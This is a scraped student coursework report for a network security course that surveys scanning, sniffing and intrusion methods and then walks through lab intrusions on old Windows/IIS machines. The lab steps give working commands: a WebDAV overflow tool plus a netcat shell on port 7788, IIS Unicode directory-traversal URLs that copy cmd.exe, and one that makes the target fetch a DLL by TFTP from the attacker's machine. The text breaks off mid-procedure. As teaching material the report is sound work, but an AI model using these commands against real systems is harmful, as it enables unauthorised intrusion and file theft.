《网络安全技术》课程考查大作业 (8).docVIP

《网络安全技术》课程考查大作业 (8).doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
大连外国语大学软件学院 成绩评定:《网络安全技术》 成绩评定: 专业:信息管理与信息系统(英日)年级:2013 班级: 21姓名: 乔熠 学号: 11号 黑客常用网络侦听、网络扫描、网络入侵方法简介 (1)网络扫描 主要分为主动式策略和被动式策略,被动式扫描不会对系统造成破坏,而主动式扫描对系统进行模拟攻击,可能会对系统造成破坏。 主动式策略是基于网络的,它通过执行一些脚本文件模拟对系统进行攻击的行为并记录系统的反应,从而发现其中的漏洞。主动式扫描一般可以分成:1、活动主机探测;2、ICMP查询;3、网络PING扫描;4、端口扫描;5、标识UDP和TCP服务;6、指定漏洞扫描;7、综合扫描。 被动式策略是基于主机之上,对系统中不合适的设置,脆弱的口令以及其他同安全规则抵触的对象进行检查。 (2)网络监听 网络监听的目的是截获通信的内容,监听的手段是对协议进行分析。 常用监听软件: 最著名:Sniffer Pro 嗅探经典:Iris 密码监听工具:Win Sniffer 密码监听工具:pswmonitor和非交换环境局域网的fssniffer等 (3)网络入侵方法 1.社会工程学攻击:利用隐藏信息或打电话请求密码和伪造Email。 2.物理攻击 3.暴力攻击 4.字典文件 利用Unicode漏洞攻击:Unicode漏洞属于IIS漏洞,可利用X-Scan扫描,安装SP1消除漏洞。 5.利用缓冲区溢出漏洞进行攻击:目前较流行。 6.SMB致命攻击:使用SMBDie V1.0。 第一种入侵方法 2.1 方法原理 利用WebDav远程溢出 2.2 入侵过程 首先将nc.exe和webdavx3.exe拷入C盘根目录,见图1-1。 图1-1 然后在DOS命令行下执行webdavx3.exe,见图1-2。 图1-2 现在我们可以看到图片1-2中显示该程序已经过期,于是我将本地时间改为2000年(图1-3),再次执行webdavx3.exe 10。执行后见图1-4。 图1-3 图1-4 该程序不能自动退出,当发现程序长时间没有反映的时候,我按下“CTRL+C”退出程序。该程序在对方的计算机上开了一个端口7788,此时输入nc –vv 10 7788,见图1-5和图1-6。 图1-5 图1-6 输入后我们可以看到已经成功入侵目标计算机,可以执行DOS了,用ipconfig检查,如图1-7。 现在连接的地址是目标机10的IP,已经成功入侵,可以进行管理员的一切操作。本次攻击结束。 2.3 入侵结果 可以执行管理员的一切操作。 第二种入侵方法 3.1 方法原理 利用Unicode删除主页 3.2 入侵过程 首先利用X-Scan对目标计算机进行扫描。因为Unicode漏洞属于IIS漏洞,所以我们只扫描IIS就可以了。接着设置IP范围(图2-1和2-1-1) 图2-1 图2-1-1 添加主机到目标地址,现在显示有许多系统漏洞,以/script开头的都是Unicode漏洞。如图2-2和2-3。 图2-2 图2-3 为了使用方便,利用语句 09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe将cmd.exe文件拷贝到scripts目录,并改名为c.exe。如图2-4 图2-4 至此,入侵成功,拷贝文件。 3.3 入侵结果入侵对方系统后可删除主页,读取C盘根目录,拷贝文件。 第三种入侵方法 4.1 方法原理 利用Unicode入侵系统 4.2 入侵过程 使用tftpd32.exe建立服务器,将idq.dll和tftpd32.exe放在同目录下,运行tftpd32.exe,见图3-1。 图3-1 现在已经在本地主机创建TFTP服务器,然后将浏览器打开,输入 09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll。如图3-2。 图3-2 现在idq.dll已经发送到目标主机,现在确认一下script目录,输入语句,显示如下图3-3 图3-3 因为我用的是同学的电脑,可以看到对应时间存在idq.dll,此时上传成功,现在将ispc.exe拷贝到C盘根目录。如图3

文档评论(0)

***** + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档